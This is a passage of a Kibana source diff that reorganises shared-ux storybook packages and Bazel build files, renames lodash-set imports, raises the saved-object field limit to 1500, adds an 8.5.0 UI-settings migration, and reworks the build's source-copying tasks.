Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/prompt/no_data_views/mocks'], -}; diff --git a/packages/shared-ux/prompt/no_data_views/mocks/package.json b/packages/shared-ux/prompt/no_data_views/mocks/package.json index b00c829ace8e5..2478bd3e76dd4 100644 --- a/packages/shared-ux/prompt/no_data_views/mocks/package.json +++ b/packages/shared-ux/prompt/no_data_views/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json b/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json +++ b/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/prompt/no_data_views/types/index.d.ts b/packages/shared-ux/prompt/no_data_views/types/index.d.ts index e143e4e6d035c..4b428cc64ad3d 100644 --- a/packages/shared-ux/prompt/no_data_views/types/index.d.ts +++ b/packages/shared-ux/prompt/no_data_views/types/index.d.ts @@ -42,7 +42,7 @@ export interface NoDataViewsPromptServices { /** * Kibana-specific service types. */ -export interface NoDataViewsPromptKibanaServices { +export interface NoDataViewsPromptKibanaDependencies { coreStart: { docLinks: { links: { diff --git a/packages/kbn-shared-ux-storybook/BUILD.bazel b/packages/shared-ux/storybook/config/BUILD.bazel similarity index 88% rename from packages/kbn-shared-ux-storybook/BUILD.bazel rename to packages/shared-ux/storybook/config/BUILD.bazel index 4f710f2dbe120..1f35734bb2147 100644 --- a/packages/kbn-shared-ux-storybook/BUILD.bazel +++ b/packages/shared-ux/storybook/config/BUILD.bazel @@ -2,16 +2,25 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config") load("@build_bazel_rules_nodejs//:index.bzl", "js_library") load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") -PKG_DIRNAME = "kbn-shared-ux-storybook" -PKG_REQUIRE_NAME = "@kbn/shared-ux-storybook" +PKG_DIRNAME = "config" +PKG_REQUIRE_NAME = "@kbn/shared-ux-storybook-config" SOURCE_FILES = glob( [ - "src/**/*.ts", - "src/**/*.tsx", + "**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,10 +46,10 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ - "//packages/kbn-shared-ux-services", "//packages/kbn-storybook", "@npm//@storybook/react", "@npm//@storybook/addon-actions", + "@npm//jest-mock", ] # In this array place dependencies necessary to build the types, which will include the @@ -53,7 +62,7 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "//packages/kbn-shared-ux-services:npm_module_types", + "@npm//jest-mock", "//packages/kbn-storybook:npm_module_types", "//packages/kbn-ambient-ui-types:npm_module_types", "//packages/kbn-ambient-storybook-types:npm_module_types", @@ -67,14 +76,12 @@ jsts_transpiler( name = "target_node", srcs = SRCS, build_pkg_name = package_name(), - root_input_dir = "src", ) jsts_transpiler( name = "target_web", srcs = SRCS, build_pkg_name = package_name(), - root_input_dir = "src", web = True, ) @@ -96,7 +103,7 @@ ts_project( declaration_map = True, emit_declaration_only = True, out_dir = "target_types", - root_dir = "src", + root_dir = ".", tsconfig = ":tsconfig", ) diff --git a/packages/shared-ux/storybook/config/README.mdx b/packages/shared-ux/storybook/config/README.mdx new file mode 100644 index 0000000000000..eeab8f1f4c987 --- /dev/null +++ b/packages/shared-ux/storybook/config/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-storybook-config + +Storybook configuration used by `yarn storybook`. Refer to `@kbn/storybook` for more information. diff --git a/packages/kbn-shared-ux-components/src/page_template/util/presentation.ts b/packages/shared-ux/storybook/config/constants.ts similarity index 58% rename from packages/kbn-shared-ux-components/src/page_template/util/presentation.ts rename to packages/shared-ux/storybook/config/constants.ts index ab7144ee37b57..8efe045ad57a1 100644 --- a/packages/kbn-shared-ux-components/src/page_template/util/presentation.ts +++ b/packages/shared-ux/storybook/config/constants.ts @@ -6,8 +6,8 @@ * Side Public License, v 1. */ -import classNames from 'classnames'; +/** The title of the Storybook. */ +export const TITLE = 'Shared UX Storybook'; -export const getClasses = (template: string | undefined, className: string | undefined) => { - return classNames('kbnPageTemplate', { [`kbnPageTemplate--${template}`]: template }, className); -}; +/** The remote URL of the root from which Storybook loads stories for Shared UX. */ +export const URL = 'https://github.com/elastic/kibana/tree/main/packages/shared_ux'; diff --git a/packages/kbn-shared-ux-components/src/page_template/util/index.ts b/packages/shared-ux/storybook/config/index.ts similarity index 82% rename from packages/kbn-shared-ux-components/src/page_template/util/index.ts rename to packages/shared-ux/storybook/config/index.ts index adfefdf834566..5a73da614bf27 100644 --- a/packages/kbn-shared-ux-components/src/page_template/util/index.ts +++ b/packages/shared-ux/storybook/config/index.ts @@ -6,5 +6,4 @@ * Side Public License, v 1. */ -export { getClasses } from './presentation'; -export * from './constants'; +export { TITLE, URL } from './constants'; diff --git a/packages/kbn-shared-ux-storybook/src/config/main.ts b/packages/shared-ux/storybook/config/main.ts similarity index 72% rename from packages/kbn-shared-ux-storybook/src/config/main.ts rename to packages/shared-ux/storybook/config/main.ts index 6e57ca8ad5e72..47a47a5a802b3 100644 --- a/packages/kbn-shared-ux-storybook/src/config/main.ts +++ b/packages/shared-ux/storybook/config/main.ts @@ -10,11 +10,7 @@ import { defaultConfig } from '@kbn/storybook'; module.exports = { ...defaultConfig, - stories: [ - '../../../shared-ux/**/*.stories.+(tsx|mdx)', - '../../../kbn-shared-ux*/**/*.stories.+(tsx|mdx)', - '../../../../src/plugins/shared_ux/**/*.stories.+(tsx|mdx)', - ], + stories: ['../../**/*.stories.+(tsx|mdx)'], reactOptions: { strictMode: true, }, diff --git a/packages/kbn-shared-ux-storybook/src/config/manager.ts b/packages/shared-ux/storybook/config/manager.ts similarity index 72% rename from packages/kbn-shared-ux-storybook/src/config/manager.ts rename to packages/shared-ux/storybook/config/manager.ts index 64284fb46f36f..fb973258b9053 100644 --- a/packages/kbn-shared-ux-storybook/src/config/manager.ts +++ b/packages/shared-ux/storybook/config/manager.ts @@ -8,14 +8,16 @@ import { addons } from '@storybook/addons'; import { create } from '@storybook/theming'; -import { PANEL_ID } from '@storybook/addon-actions'; +import { PANEL_ID as selectedPanel } from '@storybook/addon-actions'; + +import { TITLE as brandTitle, URL as brandUrl } from './constants'; addons.setConfig({ theme: create({ base: 'light', - brandTitle: 'Shared UX Storybook', - brandUrl: 'https://github.com/elastic/kibana/tree/main/src/plugins/shared_ux', + brandTitle, + brandUrl, }), + selectedPanel, showPanel: true.valueOf, - selectedPanel: PANEL_ID, }); diff --git a/packages/kbn-shared-ux-storybook/package.json b/packages/shared-ux/storybook/config/package.json similarity index 78% rename from packages/kbn-shared-ux-storybook/package.json rename to packages/shared-ux/storybook/config/package.json index c5f22bb151431..ee7206b2d87df 100644 --- a/packages/kbn-shared-ux-storybook/package.json +++ b/packages/shared-ux/storybook/config/package.json @@ -1,8 +1,8 @@ { - "name": "@kbn/shared-ux-storybook", + "name": "@kbn/shared-ux-storybook-config", "private": true, "version": "1.0.0", "main": "./target_node/index.js", "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" -} +} \ No newline at end of file diff --git a/packages/shared-ux/storybook/config/preview.ts b/packages/shared-ux/storybook/config/preview.ts new file mode 100644 index 0000000000000..5a53e48a916d8 --- /dev/null +++ b/packages/shared-ux/storybook/config/preview.ts @@ -0,0 +1,21 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +/* eslint-disable @typescript-eslint/no-namespace,@typescript-eslint/no-empty-interface */ +declare global { + namespace NodeJS { + interface Global {} + interface InspectOptions {} + type ConsoleConstructor = console.ConsoleConstructor; + } +} +/* eslint-enable */ + +import jest from 'jest-mock'; +/* @ts-expect-error TS doesn't see jest as a property of window, and I don't want to edit our global config. */ +window.jest = jest; diff --git a/packages/kbn-shared-ux-storybook/tsconfig.json b/packages/shared-ux/storybook/config/tsconfig.json similarity index 78% rename from packages/kbn-shared-ux-storybook/tsconfig.json rename to packages/shared-ux/storybook/config/tsconfig.json index b26c95a01dfd8..835b78a44758d 100644 --- a/packages/kbn-shared-ux-storybook/tsconfig.json +++ b/packages/shared-ux/storybook/config/tsconfig.json @@ -1,11 +1,11 @@ { - "extends": "../../tsconfig.bazel.json", + "extends": "../../../../tsconfig.bazel.json", "compilerOptions": { "declaration": true, "declarationMap": true, "emitDeclarationOnly": true, "outDir": "target_types", - "rootDir": "src", + "rootDir": ".", "stripInternal": false, "types": [ "jest", @@ -14,6 +14,6 @@ ] }, "include": [ - "src/**/*" + "*.ts" ] } diff --git a/packages/shared-ux/storybook/mock/BUILD.bazel b/packages/shared-ux/storybook/mock/BUILD.bazel index 71b1a263ea0af..c77d05261bc1d 100644 --- a/packages/shared-ux/storybook/mock/BUILD.bazel +++ b/packages/shared-ux/storybook/mock/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,6 +46,8 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ + "@npm//@storybook/react", + "@npm//react", ] # In this array place dependencies necessary to build the types, which will include the @@ -49,9 +60,10 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", - "@npm//@types/jest", "@npm//@storybook/react", + "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", ] jsts_transpiler( @@ -61,6 +73,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -86,7 +106,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/storybook/mock/package.json b/packages/shared-ux/storybook/mock/package.json index 18761aab4c92c..0baee9437cac0 100644 --- a/packages/shared-ux/storybook/mock/package.json +++ b/packages/shared-ux/storybook/mock/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/storybook/mock/tsconfig.json b/packages/shared-ux/storybook/mock/tsconfig.json index 39d3c7097814a..7b7386979c9a8 100644 --- a/packages/shared-ux/storybook/mock/tsconfig.json +++ b/packages/shared-ux/storybook/mock/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/scripts/synthtrace.js b/scripts/synthtrace.js index 5e551acf84769..bffa55065a17f 100644 --- a/scripts/synthtrace.js +++ b/scripts/synthtrace.js @@ -9,8 +9,8 @@ require('../src/setup_node_env'); // We have to import directly from package since scenarios and worker.js are imported dynamically, -// If we import the package (require('@elastic/apm-synthtrace')) the program will be executed on the compiled files, and thus we need to +// If we import the package (require('@kbn/apm-synthtrace')) the program will be executed on the compiled files, and thus we need to // compile scenarios with `yarn kbn bootstrap` every time scenario changes. // eslint-disable-next-line @kbn/imports/uniform_imports -require('../packages/elastic-apm-synthtrace/src/cli').runSynthtrace(); +require('../packages/kbn-apm-synthtrace/src/cli').runSynthtrace(); diff --git a/src/cli/command.js b/src/cli/command.js index 6174cab85dec3..b85037330027b 100644 --- a/src/cli/command.js +++ b/src/cli/command.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import Chalk from 'chalk'; diff --git a/src/cli/keystore/read_keystore.js b/src/cli/keystore/read_keystore.js index d3629c32671f7..a4f007690a661 100644 --- a/src/cli/keystore/read_keystore.js +++ b/src/cli/keystore/read_keystore.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { Keystore } from '.'; import { getKeystore } from '../../cli_keystore/get_keystore'; diff --git a/src/cli/serve/serve.js b/src/cli/serve/serve.js index 6425b0d6c8005..d5c1f844c4d1c 100644 --- a/src/cli/serve/serve.js +++ b/src/cli/serve/serve.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set as lodashSet } from '@elastic/safer-lodash-set'; +import { set as lodashSet } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import { statSync } from 'fs'; import { resolve } from 'path'; diff --git a/src/core/public/chrome/ui/header/collapsible_nav.tsx b/src/core/public/chrome/ui/header/collapsible_nav.tsx index abf4c5f0965eb..01064662ad304 100644 --- a/src/core/public/chrome/ui/header/collapsible_nav.tsx +++ b/src/core/public/chrome/ui/header/collapsible_nav.tsx @@ -93,6 +93,7 @@ const overviewIDs = [ 'observability-overview', 'securitySolutionUI:get_started', 'management', + 'enterpriseSearch', ]; export function CollapsibleNav({ diff --git a/src/core/server/core_app/bundle_routes/select_compressed_file.ts b/src/core/server/core_app/bundle_routes/select_compressed_file.ts index 36c63f653618c..339a99b635aaf 100644 --- a/src/core/server/core_app/bundle_routes/select_compressed_file.ts +++ b/src/core/server/core_app/bundle_routes/select_compressed_file.ts @@ -40,10 +40,6 @@ export async function selectCompressedFile(acceptEncodingHeader: string | undefi fileEncoding = 'br'; fd = await tryToOpenFile(`${path}.br`); } - if (!fd && supportedEncodings.includes('gzip')) { - fileEncoding = 'gzip'; - fd = await tryToOpenFile(`${path}.gz`); - } } if (!fd) { diff --git a/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts b/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts index c616138c31af5..a656b0bdd10e5 100644 --- a/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts +++ b/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts @@ -475,7 +475,7 @@ describe('migration actions', () => { source: 'existing_index_with_write_block', target: 'clone_target_1', }); - expect.assertions(1); + expect.assertions(3); await expect(task()).resolves.toMatchInlineSnapshot(` Object { "_tag": "Right", @@ -485,6 +485,12 @@ describe('migration actions', () => { }, } `); + const { clone_target_1: cloneTarget1 } = await client.indices.getSettings({ + index: 'clone_target_1', + }); + // @ts-expect-error https://github.com/elastic/elasticsearch/issues/89381 + expect(cloneTarget1.settings?.index.mapping?.total_fields.limit).toBe('1500'); + expect(cloneTarget1.settings?.blocks?.write).toBeUndefined(); }); it('resolves right if clone target already existed after waiting for index status to be green ', async () => { expect.assertions(2); @@ -1612,6 +1618,11 @@ describe('migration actions', () => { _tag: 'Right', right: 'create_index_succeeded', }); + const { create_new_index: createNewIndex } = await client.indices.getSettings({ + index: 'create_new_index', + }); + // @ts-expect-error https://github.com/elastic/elasticsearch/issues/89381 + expect(createNewIndex.settings?.index?.mapping.total_fields.limit).toBe('1500'); }); it('resolves left if an existing index status does not become green', async () => { expect.assertions(2); diff --git a/src/core/server/saved_objects/migrations/actions/clone_index.ts b/src/core/server/saved_objects/migrations/actions/clone_index.ts index 80b2ff527740c..e95f969f4ad82 100644 --- a/src/core/server/saved_objects/migrations/actions/clone_index.ts +++ b/src/core/server/saved_objects/migrations/actions/clone_index.ts @@ -64,20 +64,25 @@ export const cloneIndex = ({ index: source, target, wait_for_active_shards: WAIT_FOR_ALL_SHARDS_TO_BE_ACTIVE, - body: { - settings: { - index: { - // The source we're cloning from will have a write block set, so - // we need to remove it to allow writes to our newly cloned index - 'blocks.write': false, - number_of_shards: INDEX_NUMBER_OF_SHARDS, - auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS, - // Set an explicit refresh interval so that we don't inherit the - // value from incorrectly configured index templates (not required - // after we adopt system indices) - refresh_interval: '1s', - // Bump priority so that recovery happens before newer indices - priority: 10, + settings: { + index: { + // The source we're cloning from will have a write block set, so + // we need to remove it to allow writes to our newly cloned index + 'blocks.write': false, + // The rest of the index settings should have already been applied + // to the source index and will be copied to the clone target. But + // we repeat it here for explicitness. + number_of_shards: INDEX_NUMBER_OF_SHARDS, + auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS, + // Set an explicit refresh interval so that we don't inherit the + // value from incorrectly configured index templates (not required + // after we adopt system indices) + refresh_interval: '1s', + // Bump priority so that recovery happens before newer indices + priority: 10, + // Increase the fields limit beyond the default of 1000 + mapping: { + total_fields: { limit: 1500 }, }, }, }, diff --git a/src/core/server/saved_objects/migrations/actions/create_index.ts b/src/core/server/saved_objects/migrations/actions/create_index.ts index 41ee20fc9562d..0f6b062a42163 100644 --- a/src/core/server/saved_objects/migrations/actions/create_index.ts +++ b/src/core/server/saved_objects/migrations/actions/create_index.ts @@ -82,21 +82,24 @@ export const createIndex = ({ // available. If the request doesn't complete within timeout, // acknowledged or shards_acknowledged would be false. timeout, - body: { - mappings, - aliases: aliasesObject, - settings: { - index: { - // ES rule of thumb: shards should be several GB to 10's of GB, so - // Kibana is unlikely to cross that limit. - number_of_shards: 1, - auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS, - // Set an explicit refresh interval so that we don't inherit the - // value from incorrectly configured index templates (not required - // after we adopt system indices) - refresh_interval: '1s', - // Bump priority so that recovery happens before newer indices - priority: 10, + mappings, + aliases: aliasesObject, + settings: { + index: { + // ES rule of thumb: shards should be several GB to 10's of GB, so + // Kibana is unlikely to cross that limit. + number_of_shards: 1, + auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS, + // Set an explicit refresh interval so that we don't inherit the + // value from incorrectly configured index templates (not required + // after we adopt system indices) + refresh_interval: '1s', + // Bump priority so that recovery happens before newer indices + priority: 10, + // Increase the fields limit beyond the default of 1000 + // @ts-expect-error https://github.com/elastic/elasticsearch/issues/89381 + mapping: { + total_fields: { limit: 1500 }, }, }, }, diff --git a/src/core/server/saved_objects/migrations/core/document_migrator.test.ts b/src/core/server/saved_objects/migrations/core/document_migrator.test.ts index d126cdce88253..1d12d2062be93 100644 --- a/src/core/server/saved_objects/migrations/core/document_migrator.test.ts +++ b/src/core/server/saved_objects/migrations/core/document_migrator.test.ts @@ -7,7 +7,7 @@ */ import { mockGetConvertedObjectId } from './document_migrator.test.mock'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import type { SavedObjectUnsanitizedDoc, SavedObjectsType } from '@kbn/core-saved-objects-server'; import { DocumentMigrator } from './document_migrator'; diff --git a/src/core/server/saved_objects/migrations/core/document_migrator.ts b/src/core/server/saved_objects/migrations/core/document_migrator.ts index 3782a74936b6e..677b2a685f64e 100644 --- a/src/core/server/saved_objects/migrations/core/document_migrator.ts +++ b/src/core/server/saved_objects/migrations/core/document_migrator.ts @@ -43,7 +43,7 @@ import Boom from '@hapi/boom'; import uuidv5 from 'uuid/v5'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import Semver from 'semver'; import type { Logger } from '@kbn/logging'; diff --git a/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts b/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts index 03124f6e7fde7..09ec13bcae05b 100644 --- a/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts +++ b/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import * as Either from 'fp-ts/lib/Either'; import _ from 'lodash'; import { SavedObjectTypeRegistry } from '../../saved_objects_type_registry'; diff --git a/src/core/server/saved_objects/service/lib/filter_utils.ts b/src/core/server/saved_objects/service/lib/filter_utils.ts index 27ff1c201cbdd..30880368d096d 100644 --- a/src/core/server/saved_objects/service/lib/filter_utils.ts +++ b/src/core/server/saved_objects/service/lib/filter_utils.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, cloneDeep } from 'lodash'; import * as esKuery from '@kbn/es-query'; import { SavedObjectsErrorHelpers } from './errors'; diff --git a/src/core/server/ui_settings/saved_objects/migrations.test.ts b/src/core/server/ui_settings/saved_objects/migrations.test.ts index df561ef4152f6..c08f75ad9d184 100644 --- a/src/core/server/ui_settings/saved_objects/migrations.test.ts +++ b/src/core/server/ui_settings/saved_objects/migrations.test.ts @@ -310,3 +310,38 @@ describe('ui_settings 8.1.0 migrations', () => { }); }); }); + +describe('ui_settings 8.5.0 migrations', () => { + const migration = migrations['8.5.0']; + + test('returns doc on empty object', () => { + expect(migration({} as SavedObjectUnsanitizedDoc)).toEqual({ + references: [], + }); + }); + + test('removes "observability:enableInfrastructureView" setting', () => { + const doc = { + type: 'config', + id: '8.5.0', + attributes: { + buildNum: 9007199254740991, + 'observability:enableInfrastructureView': true, + }, + references: [], + updated_at: '2020-06-09T20:18:20.349Z', + migrationVersion: {}, + }; + + expect(migration(doc)).toEqual({ + type: 'config', + id: '8.5.0', + attributes: { + buildNum: 9007199254740991, + }, + references: [], + updated_at: '2020-06-09T20:18:20.349Z', + migrationVersion: {}, + }); + }); +}); diff --git a/src/core/server/ui_settings/saved_objects/migrations.ts b/src/core/server/ui_settings/saved_objects/migrations.ts index 7ed65cfe61894..73b51254d1869 100644 --- a/src/core/server/ui_settings/saved_objects/migrations.ts +++ b/src/core/server/ui_settings/saved_objects/migrations.ts @@ -138,4 +138,25 @@ export const migrations = { }), references: doc.references || [], }), + '8.5.0': (doc: SavedObjectUnsanitizedDoc): SavedObjectSanitizedDoc => ({ + ...doc, + ...(doc.attributes && { + attributes: Object.keys(doc.attributes).reduce( + (acc, key) => + [ + // owner: Team:Apm + 'observability:enableInfrastructureView', + ].includes(key) + ? { + ...acc, + } + : { + ...acc, + [key]: doc.attributes[key], + }, + {} + ), + }), + references: doc.references || [], + }), }; diff --git a/src/dev/build/build_distributables.ts b/src/dev/build/build_distributables.ts index a3c2737857a68..0649c5ddc946a 100644 --- a/src/dev/build/build_distributables.ts +++ b/src/dev/build/build_distributables.ts @@ -79,17 +79,20 @@ export async function buildDistributables(log: ToolingLog, options: BuildOptions await run(Tasks.BuildCanvasShareableRuntime); } await run(Tasks.BuildKibanaPlatformPlugins); - await run(Tasks.TranspileBabel); await run(Tasks.CreatePackageJson); await run(Tasks.InstallDependencies); await run(Tasks.GeneratePackagesOptimizedAssets); - await run(Tasks.DeleteBazelPackagesFromBuildRoot); + + // Run on all source files + // **/packages need to be read + // before DeleteBazelPackagesFromBuildRoot await run(Tasks.CreateNoticeFile); await run(Tasks.CreateXPackNoticeFile); + + await run(Tasks.DeleteBazelPackagesFromBuildRoot); await run(Tasks.UpdateLicenseFile); await run(Tasks.RemovePackageJsonDeps); await run(Tasks.CleanPackageManagerRelatedFiles); - await run(Tasks.CleanTypescript); await run(Tasks.CleanExtraFilesFromModules); await run(Tasks.CleanEmptyFolders); await run(Tasks.FleetDownloadElasticGpgKey); diff --git a/src/dev/build/tasks/clean_tasks.ts b/src/dev/build/tasks/clean_tasks.ts index 38be91ad04a6a..6184c568df07d 100644 --- a/src/dev/build/tasks/clean_tasks.ts +++ b/src/dev/build/tasks/clean_tasks.ts @@ -34,20 +34,6 @@ export const CleanPackageManagerRelatedFiles: Task = { }, }; -export const CleanTypescript: Task = { - description: 'Cleaning typescript source files that have been transpiled to JS', - - async run(config, log, build) { - log.info( - 'Deleted %d files', - await scanDelete({ - directory: build.resolvePath(), - regularExpressions: [/\.(ts|tsx|d\.ts)$/, /tsconfig.*\.(json|tsbuildinfo)$/], - }) - ); - }, -}; - export const CleanExtraFilesFromModules: Task = { description: 'Cleaning tests, examples, docs, etc. from node_modules', @@ -198,7 +184,7 @@ export const CleanExtraFilesFromModules: Task = { '**/@elastic/eui/test-env', '**/@elastic/eui/optimize', '**/@elastic/eui/i18ntokens.json', - ]); + ]).concat([/\.(ts|tsx|d\.ts)$/, /tsconfig.*\.(json|tsbuildinfo)$/]); log.info( 'Deleted %d files', diff --git a/src/dev/build/tasks/copy_source_task.ts b/src/dev/build/tasks/copy_source_task.ts index 4140b142d177f..0e4407cf767b0 100644 --- a/src/dev/build/tasks/copy_source_task.ts +++ b/src/dev/build/tasks/copy_source_task.ts @@ -6,65 +6,69 @@ * Side Public License, v 1. */ -import { discoverBazelPackages } from '@kbn/bazel-packages'; +import { resolve } from 'path'; -import { copyAll, Task } from '../lib'; +import globby from 'globby'; +import Piscina from 'piscina'; + +import { Task } from '../lib'; export const CopySource: Task = { description: 'Copying source into platform-generic build directory', async run(config, log, build) { - await copyAll(config.resolveFromRepo(), build.resolvePath(), { - dot: false, - select: [ - 'yarn.lock', - '.npmrc', - 'kibana.d.ts', - 'config/kibana.yml', - 'config/node.options', - 'typings/**', - 'tsconfig*.json', - '.i18nrc.json', - 'src/**', - - 'x-pack/plugins/**', - 'x-pack/.i18nrc.json', - 'x-pack/package.json', + const select = [ + 'yarn.lock', + '.npmrc', + 'config/kibana.yml', + 'config/node.options', + '.i18nrc.json', + 'src/**', - '!{src,x-pack}/**/*.{test,test.mocks,mock,mocks}.*', - '!{src,x-pack}/**/target/**', - '!{src,x-pack}/**/{__stories__,storybook,.storybook}/**', - '!{src,x-pack}/**/{test,tests,test_resources,test_data,__tests__,manual_tests,__jest__,__snapshots__,__mocks__,mock_responses,mocks,fixtures,__fixtures__,cypress,integration_tests}/**', + 'x-pack/plugins/**', + 'x-pack/.i18nrc.json', + 'x-pack/package.json', - '!src/dev/**', - '!src/**/mocks.{js,ts}', - '!src/cli/repl/**', - '!src/cli*/dev.js', - '!src/plugins/telemetry/schema/**', - '!src/core/server/core_app/assets/favicons/favicon.distribution.{ico,png,svg}', - '!src/functional_test_runner/**', - '!src/setup_node_env/index.js', + '!src/dev/**', + '!src/**/mocks.{js,ts}', + '!src/cli*/dev.js', + '!src/plugins/telemetry/schema/**', + '!src/core/server/core_app/assets/favicons/favicon.distribution.{ico,png,svg}', + '!src/setup_node_env/index.js', - '!x-pack/plugins/**/{ftr_e2e,e2e}/**', - '!x-pack/plugins/**/scripts/**', - '!x-pack/plugins/telemetry_collection_xpack/schema/**', + '!x-pack/plugins/telemetry_collection_xpack/schema/**', - '!**/jest.config.js', - '!**/jest.config.dev.js', - '!**/jest.integration.config.js', - '!**/jest_setup.{js,ts}', - '!**/*.{story,stories}.{js,ts}', - '!**/test_mocks.ts', - '!**/*.{sh,md,mdx,asciidoc}', - '!**/*.console', - '!**/*.scss', - '!**/*.docnav.json', - '!**/{dev_docs,docs}/**', - '!**/public/**/*.{js,ts,tsx,json}', + '!**/jest*', + '!**/*.{story,stories}.{js,ts}', + '!**/test_mocks.ts', + '!**/*.{scss,console,d.ts,sh,md,mdx,asciidoc,docnav.json}', + '!**/*.{test,test.mocks,mock,mocks,spec}.*', + '!**/{packages,dev_docs,docs,public,__stories__,storybook,.storybook,ftr_e2e,e2e,scripts,test,tests,test_resources,test_data,__tests__,manual_tests,__jest__,__snapshots__,__mocks__,mock_responses,mocks,fixtures,__fixtures__,cypress,integration_tests}/**', + ]; - // explicitly ignore all bazel package locations, even if they're not selected by previous patterns - ...(await discoverBazelPackages()).map((pkg) => `!${pkg.normalizedRepoRelativeDir}/**`), - ], + const piscina = new Piscina({ + filename: resolve(__dirname, 'copy_source_worker.js'), }); + + const globbyOptions = { cwd: config.resolveFromRepo('.') }; + const tasks = ( + await Promise.all([ + globby(select, globbyOptions), + globby( + [ + '{x-pack,src}/plugins/*/public/assets/**', + 'src/plugins/data/server/scripts/**', + 'x-pack/plugins/fleet/server/services/epm/packages/**', + '!x-pack/plugins/fleet/server/services/epm/packages/*.test.ts', + ], + globbyOptions + ), + ]) + ) + .flat() + .map((source) => piscina.run({ source })); + + await Promise.all(tasks); + await piscina.destroy(); }, }; diff --git a/src/dev/build/tasks/copy_source_worker.js b/src/dev/build/tasks/copy_source_worker.js new file mode 100644 index 0000000000000..5f18cf6f46eab --- /dev/null +++ b/src/dev/build/tasks/copy_source_worker.js @@ -0,0 +1,64 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and 